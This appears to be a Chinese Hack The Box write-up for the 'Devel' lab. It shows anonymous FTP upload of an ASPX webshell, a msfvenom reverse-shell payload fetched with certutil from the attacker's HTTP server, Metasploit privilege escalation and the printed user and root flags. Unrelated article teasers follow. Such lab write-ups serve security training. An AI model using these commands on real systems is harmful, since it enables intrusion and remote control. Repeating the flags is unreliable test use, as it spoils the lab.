HTB:Devel[WriteUP]

news2024/11/25 12:42:59

目录

连接至HTB服务器并启动靶机

1.What is the name of the service is running on TCP port 21 on the target machine?

使用nmap对靶机TCP端口进行开放扫描

2.Which basic FTP command can be used to upload a single file onto the server?

尝试匿名连接至靶机FTP服务

查看FTP服务中的文件结构

3.Are files put into the FTP root available via the webserver?

使用浏览器访问靶机80端口

使用ffuf对靶机80端口页面进行路径FUZZ

尝试直接在FTP服务中往aspnet_client目录上传文件

4.What file extension is executed as a script on this webserver? Don't include the ..

将KALI自带的ASPX_WEBSHELL拷贝到当前目录下

​编辑

通过浏览器访问Webshell

还是老老实实走FTP服务,把马子传上去吧T_T

5.Which metasploit reconnaissance module can be used to list possible privilege escalation paths on a compromised system?

切换到提权扫描模块

6.Submit the flag located on the babis user's desktop.

7.Submit the flag located on the administrator's desktop.

USER_FLAG:933242a201e4f0b3d9aa931f32376d8c

ROOT_FLAG:d762d0f53467df1fa2e5910f0e2e44ed


连接至HTB服务器并启动靶机

靶机IP:10.10.10.5

分配IP:10.10.14.12


1.What is the name of the service is running on TCP port 21 on the target machine?

使用nmap对靶机TCP端口进行开放扫描

nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.10.5

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.10.5  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 19:39 EST
Nmap scan report for 10.10.10.5 (10.10.10.5)
Host is up (0.067s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 80.82 seconds

对靶机开放的TCP端口进行脚本、服务扫描

nmap -p 21,80 -sCV 10.10.10.5

由扫描信息可知,在VERSION栏目下21端口:Microsoft ftpd


2.Which basic FTP command can be used to upload a single file onto the server?

由nmap扫描可见,靶机FTP服务允许匿名登录

尝试匿名连接至靶机FTP服务

ftp 10.10.10.5

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.

在FTP服务中,使用put命令上传文件

查看FTP服务中的文件结构

ftp> dir
229 Entering Extended Passive Mode (|||49159|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp> cd aspnet_client
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49160|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          system_web
226 Transfer complete.
ftp> cd system_web
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49161|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          2_0_50727
226 Transfer complete.
ftp> cd 2_0_50727
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49162|)
125 Data connection already open; Transfer starting.
226 Transfer complete.


3.Are files put into the FTP root available via the webserver?

使用浏览器访问靶机80端口

通过Wappalyzer插件可知,该页面使用ASP.NET作为框架

使用ffuf对靶机80端口页面进行路径FUZZ

ffuf -u http://10.10.10.5/FUZZ -w ../dictionary/common.txt

这里扫出来的aspnet_client目录很像上文FTP中dir出来的目录

尝试直接在FTP服务中往aspnet_client目录上传文件

提示被阻拦了,大概率是因为没有权限,这里回到主目录下再次尝试put上传

ftp> cd ../
250 CWD command successful.
ftp> put This_Is_A_Test
local: This_Is_A_Test remote: This_Is_A_Test
229 Entering Extended Passive Mode (|||49170|)
125 Data connection already open; Transfer starting.
     0        0.00 KiB/s
226 Transfer complete.

提示成功上传,使用curl访问该文件(这里换了个写有内容的test.txt文件)

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo 'This is a test' > test.txt (上传了这个文件)

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl http://10.10.10.5/test.txt
This is a test

经过测试,可以通过靶机FTP服务将文件上传至Web目录下(YES)


4.What file extension is executed as a script on this webserver? Don't include the ..

因为上文通过Wappalyzer插件可知,靶机Web页使用ASP.NET框架

所以大概率使用的脚本语言是:ASP、ASPX

将KALI自带的ASPX_WEBSHELL拷贝到当前目录下

cp /usr/share/webshells/aspx/cmdasp.aspx $(pwd) 

改个名,然后通过FTP服务直接上传到靶机Web目录下

mv cmdasp.aspx shell.aspx

通过浏览器访问Webshell

执行systeminfo命令或者echo %PROCESSOR_ARCHITECTURE%命令查看靶机系统位数

攻击机本地生成一个x32的Meterpreter马子

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=1425 -f exe > reverse.exe

攻击机本地通过python开启http服务

python -m http.server 7777

靶机通过Webshell将马子下载

certutil.exe -urlcache -split -f http://10.10.14.12:7777/reverse.exe reverse.exe

这个命令下载慢的一批就算了而且还容易断联,powershell的下载命令还没法用

还是老老实实走FTP服务,把马子传上去吧T_T

意外的失败了,可能是因为文件太大了?(传了两次回头再看发现已经有一个成功上传)

首先查找一下马子的位置

cd /d c:\ && dir /s reverse.exe

然后在MSF里配置好监听模块的参数

在Webshell中直接运行马子,直接输入文件完整路径即可

c:\inetpub\wwwroot\reverse.exe

Emmmmm,好像是因为文件不兼容?

最后看了官方WP,捏马的居然是直接用msfvenom生成aspx格式的马子

重新配置MSF中的监听参数并不断生成不同的MSF马子依然无法弹回Meterpreter

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.12:1425
[*] Sending stage (176198 bytes) to 10.10.10.5

一直卡在这.......(这里严重怀疑是靶机网络有问题,或者我的网络有问题)

最后更新了Metasploit解决问题


5.Which metasploit reconnaissance module can be used to list possible privilege escalation paths on a compromised system?

在Metasploit中,常用的本地提权扫描模块:local_exploit_suggester

切换到提权扫描模块

use post/multi/recon/local_exploit_suggester

SESSION设置为Meterpreter收回后的会话

set SESSION 1

从冒绿光的模块里随便选几个出来,配置好参数直接提权即可


6.Submit the flag located on the babis user's desktop.

7.Submit the flag located on the administrator's desktop.

查找user_flag、root_flag位置,并查看其内容

meterpreter > search -f user.txt
Found 1 result...
=================

Path                             Size (bytes)  Modified (UTC)
----                             ------------  --------------
c:\Users\babis\Desktop\user.txt  34            2024-11-06 22:29:47 -0500

meterpreter > search -f root.txt
Found 1 result...
=================

Path                                     Size (bytes)  Modified (UTC)
----                                     ------------  --------------
c:\Users\Administrator\Desktop\root.txt  34            2024-11-06 22:29:47 -0500

meterpreter > shell
Process 2748 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
d762d0f53467df1fa2e5910f0e2e44ed

c:\windows\system32\inetsrv>type c:\Users\babis\Desktop\user.txt
type c:\Users\babis\Desktop\user.txt
933242a201e4f0b3d9aa931f32376d8c

USER_FLAG:933242a201e4f0b3d9aa931f32376d8c

ROOT_FLAG:d762d0f53467df1fa2e5910f0e2e44ed

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2236655.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【大数据学习 | kafka高级部分】kafka的kraft集群

首先我们分析一下zookeeper在kafka中的作用 zookeeper可以实现controller的选举&#xff0c;并且记录topic和partition的元数据信息&#xff0c;帮助多个broker同步数据信息。 在新版本中的kraft模式中可以这个管理和选举可以用kafka自己完成&#xff0c;而不再依赖zookeeper。…

漫谈MCU优化:从硬件设计优化到可靠性挑战

1.关于MCU 微控制器&#xff08;Microcontroller Unit, MCU&#xff09;&#xff0c;是以微处理器为基础&#xff0c;加上存储器以及计数器、I2C、UART等外设模块与接口电路整合的单芯片微型计算机。 ▲MCU实物图 MCU拥有性能好、可编程、灵活度高、功耗低等优点&#xff0c;…

Notepad++ 更改字体大小和颜色

前言 在长时间编程或文本编辑过程中&#xff0c;合适的字体大小和颜色可以显著提高工作效率和减少眼睛疲劳。Notepad 提供了丰富的自定义选项&#xff0c;让你可以根据个人喜好调整编辑器的外观。 步骤详解 1. 更改字体大小 打开 Notepad 启动 Notepad 编辑器。 进入设置菜…

用友U8接口-isHasCounterSignPiid错误

错误消息 调用U813的审批流方法报错&#xff0c;找不到方法:“Boolean UFIDA.U8.Audit.BusinessService.ManualAudit.isHasCounterSignPiid System.Web.Services.Protocols.SoapException:服务器无法处理请求。 ---> System.MissingMethodException: 找不到方法:“Boolean…

opencv_相关的问题

Debug模型下运行&#xff0c;在命令行窗口会有一些error相关的log信息。 通过调整log的等级&#xff0c;屏蔽掉INFO的log信息 #include <opencv2/core/utils/logger.hpp>cv::utils::logging::setLogLevel(cv::utils::logging::LOG_LEVEL_ERROR);

网页中的某个元素高度突然无法设置

做网页时本来一个div的高度好好的&#xff0c;结果代码打着打着突然发现有个div的高度变的很小&#xff0c;把我很多在这个div里的元素给搞的看不见了。 找了好久的原因最后发现是这个div的结束标签</div>不小心被我删了,之后把这个</div>给补上就好了。

【SSL-RL】自监督强化学习:引导式潜在预测表征 (BLR)算法

&#x1f4e2;本篇文章是博主强化学习&#xff08;RL&#xff09;领域学习时&#xff0c;用于个人学习、研究或者欣赏使用&#xff0c;并基于博主对相关等领域的一些理解而记录的学习摘录和笔记&#xff0c;若有不当和侵权之处&#xff0c;指出后将会立即改正&#xff0c;还望谅…

寻找存在的路径/寻找图中是否存在路径 C# 并查集

卡码网 107 与 力扣的1971 寻找图中是否存在路径 相似 感觉还是有点不熟悉得多练1 107. 寻找存在的路径 题目描述 给定一个包含 n 个节点的无向图中&#xff0c;节点编号从 1 到 n &#xff08;含 1 和 n &#xff09;。 你的任务是判断是否有一条从节点 source 出发到…

【数据集】【YOLO】【目标检测】安全帽识别数据集 22789 张,YOLO安全帽佩戴目标检测实战训练教程!

数据集介绍 【数据集】安全帽识别数据集 22789 张&#xff0c;目标检测&#xff0c;包含YOLO/VOC格式标注。数据集中包含2种分类&#xff1a;{0: head, 1: helmet}&#xff0c;分别是无安全帽和佩戴安全帽。数据集来自国内外图片网站和视频截图。检测场景为施工地工人安全帽佩…

洞察鸿蒙生态,把握开发新机遇

随着科技的不断进步&#xff0c;鸿蒙系统以其独特的分布式架构和跨设备协同能力&#xff0c;逐渐在智能手机、智能穿戴、车载、家居等多个领域崭露头角&#xff0c;与安卓、iOS形成三足鼎立之势。作为一名开发者&#xff0c;我对鸿蒙生态的认知和了解如下&#xff1a; 一、鸿蒙…

Node.js 全栈开发进阶篇

​&#x1f308;个人主页&#xff1a;前端青山 &#x1f525;系列专栏&#xff1a;node.js篇 &#x1f516;人终将被年少不可得之物困其一生 依旧青山,本期给大家带来node.js篇专栏内容:node.js- 全栈开发进阶篇 前言 大家好&#xff0c;我是青山。在上一篇文章中&#xff0c;…

VS Code 插件 MySQL Shell for VS Code

https://marketplace.visualstudio.com/items?itemNameOracle.mysql-shell-for-vs-code

2024年云手机推荐榜单:高性能云手机推荐

无论是手游玩家、APP测试人员&#xff0c;还是数字营销工作者&#xff0c;云手机都为他们带来了极大的便利。本文将为大家推荐几款在市场上表现优异的云手机&#xff0c;希望这篇推荐指南可以帮助大家找到最适合自己的云手机&#xff01; 1. OgPhone云手机 OgPhone云手机是一款…

「QT」QT5程序设计专栏目录

✨博客主页何曾参静谧的博客&#x1f4cc;文章专栏「QT」QT5程序设计&#x1f4da;全部专栏「VS」Visual Studio「C/C」C/C程序设计「UG/NX」BlockUI集合「Win」Windows程序设计「DSA」数据结构与算法「UG/NX」NX二次开发「QT」QT5程序设计「File」数据文件格式「PK」Parasolid…

VMWARE ESXI VMFS阵列故障 服务器数据恢复

1&#xff1a;河南用户一台DELL R740 3块2.4T硬盘组的RAID5&#xff0c;早期坏了一个盘没有及时更换&#xff0c;这次又坏了一个&#xff0c;导致整组RAID5处于数据丢失的状态&#xff0c; 2&#xff1a;该服务器装的是VMware ESXI 6.7&#xff0c;用户把3块硬盘寄过来进行数据…

怎么对 PDF 添加权限密码或者修改密码-免费软件分享

序言 目前市面上有关PDF处理的工具有很多&#xff0c;不过绝大多数的PDF处理工具都需要付费使用&#xff0c;且很多厂商甚至连试用的机会也不给用户&#xff0c;偶有试用的&#xff0c;其试用版的条件也极为苛刻&#xff0c;比如只能处理前两页&#xff0c;或者只能处理非常小的…

轻松上云:使用Python与阿里云OSS实现文件上传

轻松上云&#xff1a;使用Python与阿里云OSS实现文件上传 ​ 在数字化时代&#xff0c;数据的存储和管理变得越来越重要。阿里云对象存储服务&#xff08;OSS&#xff09;提供了一种高效、安全的方式来存储和访问各种类型的文件。本文将介绍如何利用Python编程语言结合阿里云O…

通过包控制->获取包重新获取之后,需求类型列表不对

龙勤思(2017年11月27日)&#xff1a; 这个类型列表&#xff0c;我在把需求包提交到svn&#xff0c;再新建一个eap&#xff0c;通过包控制->获取包重新获取之后&#xff0c;就变成默认的如下列表了。我从你的原始的eap导出参考数据&#xff0c;再导入到新建的eap&#xff0c…

python+pptx:(三)添加统计图、删除指定页

目录 统计图 删除PPT页 from pptx import Presentation from pptx.util import Cm, Inches, Mm, Pt from pptx.dml.color import RGBColor from pptx.chart.data import ChartData from pptx.enum.chart import XL_CHART_TYPE, XL_LABEL_POSITION, XL_DATA_LABEL_POSITIONfil…

基础概念理解

一&#xff0c;数据结构分类 连续结构&#xff0c;跳转结构。 二&#xff0c;对变量的理解 在 C 语言中&#xff0c;变量是用于存储数据的抽象符号。变量本质上是一块内存区域的标识符&#xff08;即它代表内存中的某一块区域&#xff09;&#xff0c;用来存储数据&#xff…